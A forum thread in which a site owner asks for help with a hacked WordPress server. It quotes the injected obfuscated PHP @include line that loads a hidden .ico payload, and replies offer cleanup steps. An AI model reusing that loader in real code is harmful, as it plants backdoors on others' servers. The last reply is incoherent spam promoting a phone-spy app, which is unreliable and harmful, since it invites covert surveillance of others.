Hacked Server? Malicious .ICO Files & @include php tags

[bankzy]

So a few months ago I had a wordpress site installed under the same admin username as 3 other sites on my control panel. I removed the wordpress site after a hack happened and was redirecting with stupid redirects. I had my server formatted and data migrated back. I have since discovered I have random @includes in many index.php files, they go like this for example;

Code: Select all

<?php
/*01e78*/

@include “\057ho\155e/\150cm\162eu\065/b\154an\143va\056co\155/w\160-a\144mi\156/i\155ag\145s/\05683\1425c\14270\056ic\157”;

/*01e78*/

I can clearly tell these are secret decoded php codes so when I decrypt the code with https://malwaredecoder.com/ I'm able to locate where this malicious code is calling a random .ico file thats being inserted in a random directory in my public_html directory. After doing some digging around I found other users having this issue and I saw something about other random .php files may be in some directories. So I performed the following command to locate random .php files (like dkelfesa.php for example)

Code: Select all

find . -type f | egrep './[a-z]{8}\.php'

I assume these files are apart of the malicious redirects that are creating these .ico files and inserting the encoded malware into index.phps? I've even performed a <?php search in my phpmyadmin to see if they are doing this from there. Now after removing these files and @include commands in index.php files and changing the password for the username (I no longer have a admin account and 1 username for each website) these malicious .ico files are still appearing and @include commands are still being inserted (weirdly at 2am everyday when I remove them) into index.phps.

Can anyone give me some pointers on how to sort this issue out? It's really annoying having to perform searches everyday at 2am to stop this malicious redirects from ruining my traffic. I don't want to perform a server format again as I have 100s of 1000GBs of data on my server and this is just happening for one website alone and not affecting the others

Thanks guys!

[aguilar1181]

I have this issues happen to me. The first thing I did was download all files locally.

I started by replacing the wordpress files. I deleted wp-admin, wp-include, as well as any file in root folder with the exception of wp-config.php and replaces them with a fresh copy.

Next, I deleted plugins one-by-one and download fresh files for each plugin to replaced.

Next, I deleted any unneeded theme. The main theme assuming no modifications were made I just replaced it with a fresh copy. If a child theme exist then I would manually scan those file. If is custom theme obviously you can’t just replace all the files, so you have to scan those files manually.

Finally, after I made sure every file was clean I deleted every file on the server. After deleting the files and before uploading the fresh ones, I reset it every password on the server (ftp, cpanel, etc). Once the new files were uploaded, I’ve logged in to Wordpress and change every user password.

Last, I changed the default wordpress login url.

Good luck to you.

[DanielLento]

To connect the scripts. There is also a very auspicious symbol. This is for extinguishing errors in the debugger if I'm not mistaken. Malicious files may arrive on your computer and you won’t even know about it. Spyware such as https://www.hoverwatch.com/free-cell-phone-spy allows you to monitor your actions and correspondence.